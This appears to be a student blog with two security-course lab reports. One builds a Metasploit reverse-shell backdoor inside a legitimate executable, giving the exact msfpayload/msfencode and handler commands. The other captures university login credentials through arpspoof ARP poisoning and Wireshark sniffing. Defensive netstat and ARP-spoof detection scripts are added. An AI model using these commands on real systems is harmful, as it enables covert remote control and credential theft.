    Trojan Remote Access termasuk Trojan paling populer saat ini. Banyak penyerang menggunakan Trojan ini dengan alasan fungsi yang banyak dan sangat mudah dalam penggunaannya. Prosesnya adalah menunggu seseorang menjalankan Trojan yang berfungsi sebagai server dan jika penyerang telah memiliki IP address korban, maka penyerang dapat mengendalikan secara penuh komputer korban. Contoh jenis Trojan ini adalah Back Orifice (BO), yang terdiri dari BOSERVE.EXE yang dijalankan dikomputer korban dan BOGUI.EXE yang dijalankan oleh penyerang untuk mengakses komputer korban.

    2.4.2 Password-Sending Trojan

    The purpose of this type of Trojan is to send passwords found on the victim's computer or on the Internet to a special e-mail address that has been prepared in advance. Examples of intercepted passwords are those for ICQ, IRC, FTP, HTTP or other applications that require a user to enter a login and password. Most of these Trojans use port 25 to send the e-mail. This type is very dangerous if very important passwords are stored on the computer.

    2.4.3 File Transfer Protocol (FTP) Trojan

    The FTP Trojan is the simplest and is considered outdated. Its only function is to open port 21 on the victim's computer, which makes it easy for anyone with an FTP client to enter the victim's computer without a password and download or upload files.

    2.4.4 Keyloggers

    Keyloggers are a simple type of Trojan whose function is to record the keystrokes the victim types and store them in a log file. If those keystrokes include a user name and password, the attacker can obtain both by reading the log file. This Trojan can run while the computer is online or offline. It can tell when the victim is online and record everything; when offline, recording starts after Windows boots, the data is stored on the victim's hard disk, and the Trojan waits until the computer is online to transfer it or have it collected by the attacker.

    2.4.5 Destructive Trojan


    2.4.6 Denial of Service (DoS) Attack Trojan

    The DoS Attack Trojan is currently among the very popular ones. This Trojan is able to carry out a Distributed DoS (DDoS) if it has enough victims. The main idea is that if the attacker has 200 infected ADSL users, they can then start attacking a target simultaneously. The result is extremely heavy traffic, because the flood of requests exceeds the target's bandwidth capacity, and Internet access is cut off. Wintrinoo is a DDoS tool that has recently become popular, and if an attacker has infected enough ADSL users, several major Internet sites will collapse. Another variation of the DoS Trojan is the mail-bomb Trojan, whose main purpose is to infect as many computers as possible and then attack specific e-mail addresses, or other specific addresses, simultaneously with random targets and content that cannot be filtered.

    2.4.7 Proxy/Wingate Trojan

    An interesting form used by Trojan authors to deceive victims is to turn the victim's machine into a Proxy/Wingate server made available to the whole world or only to the attacker. A Proxy/Wingate Trojan is used for anonymous Telnet, ICQ and IRC, for registering domains with stolen credit card numbers, and for other illegal activities. This Trojan provides the attacker with anonymity and the opportunity to do anything through the victim's computer while leaving tracks that cannot be traced.

    2.4.8 Software Detection Killers

    Some Trojans are equipped with the ability to disable detection software, but there are also stand-alone programs with the same function. Examples of detection software whose function can be disabled are Zone Alarm, Norton Anti-Virus and other anti-virus/firewall programs that protect the computer. Once the detection software is disabled, the attacker has full access to the victim's computer, can carry out various illegal activities, and can use the victim's computer to attack other computers.

    2.5 How to Deal with the Dangers of Trojan Horses

    2.5.1 Task List

    Detection is done by looking at the list of running programs in the task list. The list can be displayed by pressing CTRL+ALT+DEL or by right-clicking the taskbar and clicking Task Manager. Besides seeing which programs are running, the user can terminate any program that looks strange or suspicious. However, some Trojans are still able to hide themselves from this task list. To see every running program, open the System Information Utility (msinfo32.exe), located in C:\Program files\common files\microsoft shared\msinfo. This tool can show all running processes, whether hidden from the task list or not. The things to check are the path, file name, file properties, and the running *.exe and *.dll files.

    2.5.2 Netstat

    Every Trojan needs to communicate. If it does not communicate, its purpose is wasted. This is the main weakness of Trojans: by communicating they leave traces that can then be followed. The Netstat command shows the open connections to and from one's computer. When this command is run it displays the IP address of that computer and of the computers connected to it. If an unknown IP address is found, it needs to be investigated further, chased and caught.

    2.5.3 TCP View

    TCPVIEW is a free utility from Sysinternals that can display the IP address and the program used by someone else to connect to the user's computer. With that information, an attack can be recognised when it happens and a counter-attack can be launched. Steps for removing a Trojan: a Trojan can be removed by using anti-virus software, since some anti-virus products can recognise and remove Trojans, or by using Trojan scanner software, which is dedicated to detecting and removing Trojans. The most brutal way is, well, to reinstall the computer.
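    The Netstat and TCPView checks above can be turned into a repeatable triage step. The following is an added example (not the essay's own code) that parses a constructed Windows `netstat -ano` listing together with a constructed PID-to-image map from `tasklist`, and flags unexpected listeners, connections to hosts outside an allowlist, and non-browser processes talking to port 443; the allowlist, baseline ports and sample rows are all assumptions made for the example.

```python
"""Triage of a Windows `netstat -ano` listing for Trojan-style connections.

Added example for the Netstat / TCPView discussion; not the essay's own code.
The netstat lines and the PID-to-image map below are constructed.
"""
import ipaddress
import re

# Constructed sample of `netstat -ano` output (Windows 7 format).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING       2288
  TCP    192.168.0.2:49160      192.168.0.1:443        ESTABLISHED     2288
  TCP    192.168.0.2:49161      93.184.216.34:443      ESTABLISHED     1520
  UDP    0.0.0.0:5355           *:*                                    1040
"""

# Constructed `tasklist` view: PID -> image name.
PID_TO_IMAGE = {4: "System", 704: "svchost.exe", 1040: "svchost.exe",
                1520: "iexplore.exe", 2288: "mdma1.exe"}

# Baseline the defender maintains (assumed values): ports this host should
# listen on, processes expected to talk to 443, and remote networks treated
# as known. The LAN peer is deliberately not allowlisted so it gets reviewed.
EXPECTED_LISTEN_PORTS = {135, 445, 5355}
EXPECTED_WEB_CLIENTS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
KNOWN_REMOTE_NETS = [ipaddress.ip_network("93.184.216.0/24")]

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\w+)\s+)?(\d+)\s*$")


def split_endpoint(ep):
    """'192.168.0.1:443' -> ('192.168.0.1', 443); '*:*' -> ('*', None)."""
    host, _, port = ep.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Return one dict per connection row; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        rows.append({"proto": proto, "local": split_endpoint(local),
                     "foreign": split_endpoint(foreign),
                     "state": state or "", "pid": int(pid)})
    return rows


def triage(rows, pid_to_image):
    """Return (pid, image, reason) findings for rows that deviate from the baseline."""
    findings = []
    for r in rows:
        image = pid_to_image.get(r["pid"], "<unknown>")
        lport = r["local"][1]
        fhost, fport = r["foreign"]
        if r["state"] == "LISTENING" and lport not in EXPECTED_LISTEN_PORTS:
            findings.append((r["pid"], image,
                             f"unexpected listener on {r['proto']}/{lport}"))
        if r["state"] == "ESTABLISHED":
            addr = ipaddress.ip_address(fhost)
            if not any(addr in net for net in KNOWN_REMOTE_NETS):
                findings.append((r["pid"], image,
                                 f"connection to unlisted host {fhost}:{fport}"))
            # A reverse shell on 443 looks like HTTPS; the process name tells it apart.
            if fport == 443 and image not in EXPECTED_WEB_CLIENTS:
                findings.append((r["pid"], image,
                                 f"non-browser process using {fhost}:443"))
    return findings


if __name__ == "__main__":
    for pid, image, reason in triage(parse_netstat(NETSTAT_SAMPLE), PID_TO_IMAGE):
        print(f"PID {pid} ({image}): {reason}")
```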

    2.6 What Metasploit Is

    Metasploit is security software often used to test the resilience of a system by exploiting weaknesses in the system's software. Metasploit is usually used to attack the application layer with a 0-day attack, an attack method against software that has not yet been patched. Metasploit is usually associated with the term remote exploitation, meaning that an attacker at a distance can control the victim's computer. Metasploit attacks by sending an exploit to the victim's computer. The exploit carries a payload chosen by the attacker. An exploit is software that takes advantage of a weakness in the victim's software (for example a web browser); after exploiting it successfully, the exploit places the payload in the victim's memory. The payload is an executable belonging to the attacker that runs on the victim's computer in order to control that computer remotely or to install a backdoor, Trojan, virus, worm and so on. Apart from Metasploit being misused for crime, this software also helps system security staff strengthen their network's defences against outside attackers.

    Chapter 3 Experimental Method

    3.1 Place and Time of Experiment

    The experiment was carried out at home at Jln. Kusuma Bangsa 5, Denpasar, Bali, on Monday, 5 April 2013, from 23:00 to 24:00.

    3.2 Tools and Materials

    ACER Laptop

    • Intel® Pentium® dual-core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
    • Mobile Intel® Graphics Media Accelerator 4500MHD
    • 1GB DDR2
    • 128 WXGA Acer CrystalBriteTM LCD
    • 250GB HDD
    • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
    • Atheros Communications Inc. AR928X Wireless Network Adapter
    • Operating System Linux Backtrack 5 R3 32 bit

    PC

    • Intel® Pentium® core i5 processor
    • 4 GB RAM
    • 1GB VGA
    • Gigabit Ethernet Controller
    • Alcor Micro, Corp. USB 2.0 PC Camera
    • Operating System Windows 7 Ultimate 32 bit

    3.3 Experimental Procedure

    If Metasploit is not yet installed, install it with the command "apt-get install metasploit apache2". Because this is Metasploit version 4.5 it has to be installed via the web, which is why Apache is needed. Then open a browser and go to https://localhost:3790. Obtain the license and update in the terminal with the command "msfupdate". If it worked there will be a folder /opt/metasploit.

    Figure 3.1 Installing Metasploit

    To see the payloads that Metasploit provides, use "msfpayload -l". The one used here is windows/meterpreter/reverse_tcp.

    Figure 3.2 Viewing the payloads provided by Metasploit (1)
    Figure 3.3 Viewing the payloads provided by Metasploit (2)

    Look up the IP address of the network interface to be used for the connection with the command "ifconfig". Here the IP address is 192.168.0.1.

    Figure 3.4 Viewing the IP address of the network interface

    Here the file to which the payload is attached is mdma.exe, located in /root. The command is "msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/mdma.exe -k -o /root/mdma1.exe". LHOST is the listening host, i.e. the IP address of this network interface. LPORT is the listening port, chosen as you like. Thanks to msfencode and shikata_ga_nai, attaching the Trojan is possible. -e determines the format, namely x86, -c sets the number of iterations, -t selects the file extension, -x specifies the location of the file, -k makes the payload run in a separate task so that the original program can still run, and -o is the location and name of the new file.

    Figure 3.5 Creating the backdoor

    Prepare msfconsole to control the victim's computer. Type "-help" if you are not yet familiar with the commands. A "search [any word]" command is available to list the commands related to what was typed.

    Figure 3.6 Msfconsole

    Type the command "use exploit/multi/handler" (used for the backdoor). Next type "set payload windows/meterpreter/reverse_tcp" (the payload used).

    Figure 3.7 Using exploit/multi/handler
    Figure 3.8 Using windows/meterpreter/reverse_tcp

    Continue with "set lhost 192.168.0.1" (listening host), then "set lport 443" (listening port), and type "show options" to review the settings.

    Figure 3.9 Setting the options

    The last command is "exploit"; all that remains is to wait for the victim to run mdma1.exe.

    Figure 3.10 The exploit command

    Chapter 4 Discussion

    4.1 Entering the victim's PC with the backdoor that was created

    Assume that the victim's PC does not use antivirus, and that the victim is sent the file mdma1.exe and runs it. The program appears to run as usual, but access is opened from the attacker's PC. The following is the IP configuration of the victim's PC:

    Figure 4.1 The file mdma1.exe to be sent to the victim's PC
    Figure 4.2 IP address of the victim's PC
    Figure 4.3 The victim opens the file mdma1.exe
    Figure 4.4 The attacker's PC gains access
    Figure 4.5 Proven by listing the directory: the contents of partition D on the victim's PC
    Figure 4.6 The contents of partition D seen from the attacker's PC

    Chapter 5 Closing

    5.1 Conclusion

    The experiment shows that Trojan horses, backdoors and the like work covertly. The malware is inserted into a file and runs when that file is executed. The file works as usual but also performs another task according to the inserted malware. In this experiment the malware's task was to give the attacker's PC access to the victim's PC, so the attacker's PC obtained access like an admin.

    5.2 Suggestions

    This experiment can be developed further, for example with the victim's PC running antivirus, with an operating system other than Windows, or with other variations. It could also use something other than msfpayload, a self-written program, a Trojan with a new concept, or other ideas.

    Mirror

    November 28, 2020

    Man in The Middle Demonstration with Arpspoof and Wireshark

    Figure 0. ARP poisoning illustration

    Note

    This is my undergraduate assignment from the Data Security Systems course, which I translated into English myself, where I was only assigned to write an essay on "man in the middle" but was also interested in practicing it using the Arpspoof and Wireshark applications on Linux. Apart from myself, our group consisted of my colleagues Yulianti Murprayana, I Made Dwi Angga Pratama, Muhammad Audy Bazly, and I Nyoman Arta Jaya. This assignment has never been published anywhere, and we as the authors and copyright holders license it under a customized CC-BY-SA where anyone can share, copy, republish, and sell it on condition that our names are stated as the authors and that the original and open version available here is acknowledged. If you are only interested in the practice, just follow the video.

    Chapter 1 Introduction

    1.1 Background

    Wireshark is software for capturing packets passing on the network, which is called packet sniffing. Sniffing itself means smelling, as a dog does when following a trail. Wireshark is not intended for hacking but as traffic-monitoring and hacking-detection software, meaning that it monitors traffic conditions so that a breach or something unusual on the network can be detected. However, Wireshark can also function as hacking software.

    Wireshark captures all passing packets, meaning that a username and password that are sent are captured too. If you are connected to the network and can find out which other hosts are connected, it is possible to kill the activities carried out by that host, namely by using ARP (Address Resolution Protocol) poisoning and sniffing. In this assignment, we will try to capture a host's username and password for various web addresses using a combination of scanning, ARP poisoning and sniffing.

    1.2 Problem

    Can we capture usernames and passwords of other hosts connected to the same network by scanning, ARP poisoning and sniffing?

    1.3 Objective

    To find out whether the username and password for elearning.unud.ac.id can be captured by scanning, ARP poisoning and sniffing.

    1.4 Benefit

    1. Knowing how to monitor other hosts on the same network.
    2. Gives knowledge of prevention methods.
    3. Can be encouraged to increase the level of security on the network.
    4. Readers will be more careful about releasing private data on a network.

    1.5 Scope and Boundaries

    1. The capture of the username and password is carried out on the websites with logins at elearning.unud.ac.id, blog.unud.ac.id and simak.ft.unud.ac.id.
    2. Experiments are carried out on hosts that are on the same network, LAN (Local Area Network).

    Chapter 2 Literature Review

    2.1 NMAP (Network Mapper)

    NMAP is open source software for scanning networks. NMAP uses raw IP (Internet Protocol) packets to find out whether a host is up, which services the host provides, whether there are firewalls or filters, and which operating system is used. Although NMAP is made for scanning large networks, it is also good for checking a single host (Lyon, 2013).

    2.2 ARP (Address Resolution Protocol)

    ARP works between layer 2 and layer 3 in the OSI (Open System Interconnection) layer because the MAC (Media Access Control) address works at layer 2 and the IP address works at layer 3. ARP is used on TCP/IP networks. ARP functions to convert network addresses at layer 3 to physical addresses at layer 2 (Mitchell, 2013).

    2.3 ARPSpoof

    Arpspoof is an application for performing ARP poisoning. Arpspoof sends ARP packets claiming that the gateway's IP address belongs to the MAC address of the computer performing the ARP poisoning. This means that the victim's computer sends its traffic to the attacker's computer, which then forwards it to the gateway, so that information such as the username and password can be captured. In the original condition the victim's computer sends traffic straight to the gateway, so the other computers cannot capture the packets sent by the victim's computer (Uhlmann, 2003).

    2.4 Sniffing

    Packet sniffing, or packet analysis, is the process of capturing data across a local network and looking for any information that might be of use. Most of the time, we system administrators use packet sniffing to troubleshoot network problems (such as finding out why traffic is so slow on a part of the network) or to detect intrusions or compromised workstations (such as a workstation connected to a remote machine on port 6667 continuously when you're not using an IRC client), and that's what the type of analysis was originally designed for. But, that hasn't stopped people from finding more creative ways to use the tool. The focus quickly moved away from the intention so much that packet sniffers were considered native security tools rather than network tools today (Hannah, 2011).

    Chapter 3 Experimental Method

    3.1 Place and Time of Experiment

    The experiment was carried out at the Computer Lab, Electrical Engineering, Udayana University, Jimbaran, Bali, on Monday, May 1, 2013, at 20:00 - 24:00.

    3.2 Tools and Materials

    The following are the tools used for research:

    ACER Laptop:

    • Intel® Pentium® dual-core processor T4200 (2.0 GHz, 800 MHz FSB, 1 MB L2 cache)
    • Mobile Intel® Graphics Media Accelerator 4500MHD
    • 1GB DDR2
    • 128 WXGA Acer CrystalBriteTM LCD
    • 250GB HDD
    • Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet Controller
    • Atheros Communications Inc. AR928X Wireless Network Adapter
    • Operating System Linux Backtrack 5 R3 32 bit

    Software:

    • NMAP
    • Telnet
    • Hydra

    The following are the materials used for research:

    PC:

    • Intel® Pentium® core i5 processor
    • 4 GB RAM
    • 1GB VGA
    • Gigabit Ethernet Controller
    • Alcor Micro, Corp. USB 2.0 PC Camera
    • Operating System Windows 7 Ultimate 32 bit

    3.3 Experiment Step

    3.4.1 Scan Host Alive and check IP (Internet Protocol) configuration

    The first thing to do is to see the IP configuration when entering a network that is DHCP (Dynamic Host Configuration Protocol) with the command "ifconfig".

    Figure 3.1 PC Configuration

    The second thing to do is to check which hosts are on or off. If the IP addresses are not known, you can scan a certain IP (Internet Protocol) address range or use ARP (Address Resolution Protocol). With nmap the command is "nmap -sn 172.16.150.32/27"; this command checks which hosts are alive using ping, from 172.16.150.32 to 172.16.150.63.

    Figure 3.2 Scan results with NMAP

    Here the host with IP address 172.16.150.34 is the experimental material.

    3.4.2 ARP (Address Resolution Protocol) Poisoning

    Before doing ARP poisoning, ip_forward must be enabled with the command "echo 1 > /proc/sys/net/ipv4/ip_forward". In this assignment ARP poisoning is carried out with the open source Arpspoof software. The command is "arpspoof -i eth0 -t 172.16.150.34 172.16.150.33".

    Figure 3.3 ARP poisoning with arpspoof

    3.4.3 Sniffing

    In this assignment, sniffing is done with the open source software Wireshark and captures packets on the eth0 interface (cable).

    Figure 3.4 Sniffing with Wireshark

    Chapter 4 Discussion

    4.1 Experiment Results

    To make the login easier to find, filter so that only packets originating from 172.16.150.34 and only HTTP are displayed. Logins usually use a form. In Figure 3.4, the source 172.16.150.34 is the experimental material and the destination 103.29.196.230 is elearning.unud.ac.id. The login protocol is HTTP. The username and password are visible, presumably because there is no encryption.

    Figure 4.1 The recorded Physical Address of the gateway changes to the intruder's Physical Address

    Arpspoof in Figure 3.3 modifies the ARP table: the gateway 172.16.150.33 with MAC address CC:EF:48:F8:D0:FF (seen in Figure 3.2) is changed to 00:23:5A:49:B7:F5 in Figure 4.1. This means the default gateway entry now points to the computer doing the ARP poisoning, so the experimental-material computer sends its packets via the computer running arpspoof first. With ip_forward enabled, the packets are forwarded on to the gateway as if there were no interruption.
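    The ARP-table change identified above (and the Arpspoof behaviour described in Section 2.3) is exactly what a monitoring host can watch for. The following is an added example, not the assignment's own code: it parses constructed lines resembling `tcpdump -n arp` output, reusing the gateway and intruder addresses from the essay, and raises an alert when an IP is re-announced with a different MAC or when one MAC starts claiming several IPs; the victim's MAC and the timestamps are placeholders.

```python
"""Detector for the gateway-MAC change seen in Figure 4.1.

Added example for the arpspoof discussion; not the assignment's own code.
The capture below is constructed to resemble `tcpdump -n arp` output and
reuses the gateway/intruder addresses from the essay; the victim's MAC
(02:00:00:00:00:34) is a placeholder.
"""
import re
from collections import defaultdict

GATEWAY_IP = "172.16.150.33"

# Constructed capture: two honest replies, then the intruder's poisoned
# replies. The last line assumes the intruder also poisons the victim's
# entry (the reverse direction), to show the "one MAC, many IPs" symptom.
CAPTURE = """\
20:00:01.000000 ARP, Reply 172.16.150.33 is-at cc:ef:48:f8:d0:ff, length 28
20:00:01.050000 ARP, Reply 172.16.150.34 is-at 02:00:00:00:00:34, length 28
20:00:05.000000 ARP, Reply 172.16.150.33 is-at 00:23:5a:49:b7:f5, length 28
20:00:07.000000 ARP, Reply 172.16.150.33 is-at 00:23:5a:49:b7:f5, length 28
20:00:07.100000 ARP, Reply 172.16.150.34 is-at 00:23:5a:49:b7:f5, length 28
"""

REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)


def parse_replies(text):
    """Yield (timestamp, ip, mac) for each ARP reply line; other lines are skipped."""
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            yield m["ts"], m["ip"], m["mac"].lower()


class ArpWatch:
    """Tracks IP->MAC bindings and reports the two arpspoof symptoms:
    a known IP re-announced with a new MAC, and one MAC claiming several IPs."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)

    def observe(self, ts, ip, mac):
        """Record one reply and return the alerts it triggers (possibly none)."""
        alerts = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            # A moved gateway is the classic MITM sign, so it is rated higher.
            sev = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            alerts.append(f"{ts} {sev}: {ip} moved from {old} to {mac}")
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            claimed = ", ".join(sorted(self.mac_to_ips[mac]))
            alerts.append(f"{ts} WARNING: {mac} now claims {claimed}")
        return alerts


def run(text, gateway_ip=GATEWAY_IP):
    """Feed every reply in the capture through ArpWatch and collect the alerts."""
    watch = ArpWatch(gateway_ip)
    alerts = []
    for ts, ip, mac in parse_replies(text):
        alerts.extend(watch.observe(ts, ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in run(CAPTURE):
        print(alert)
```

On a real host the same logic can be fed from a live `tcpdump -n arp` pipe, or the static gateway entry can simply be pinned so the poisoned reply is ignored.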

    Chapter 5 Conclusion

    5.1 Conclusion

    Usernames and passwords can be captured by scanning, ARP poisoning and sniffing the information contained in the packets that pass by. From the experiment it appears that there is no encryption of the username and password in the packets to elearning.unud.ac.id, blog.unud.ac.id and simak.ft.unud.ac.id. However, kaskus.co.id applies MD5 to the password, so it is not easy to read. In the experiment, scanning used the NMAP software, ARP poisoning used Arpspoof, and sniffing used Wireshark. With this combination, the activity of other hosts on the local network can be monitored.

    5.2 Future Work

    This paper can be used as further research with hosts having different operating systems, using other software, or a more in-depth discussion of the methods used.

    Reference

    Mirror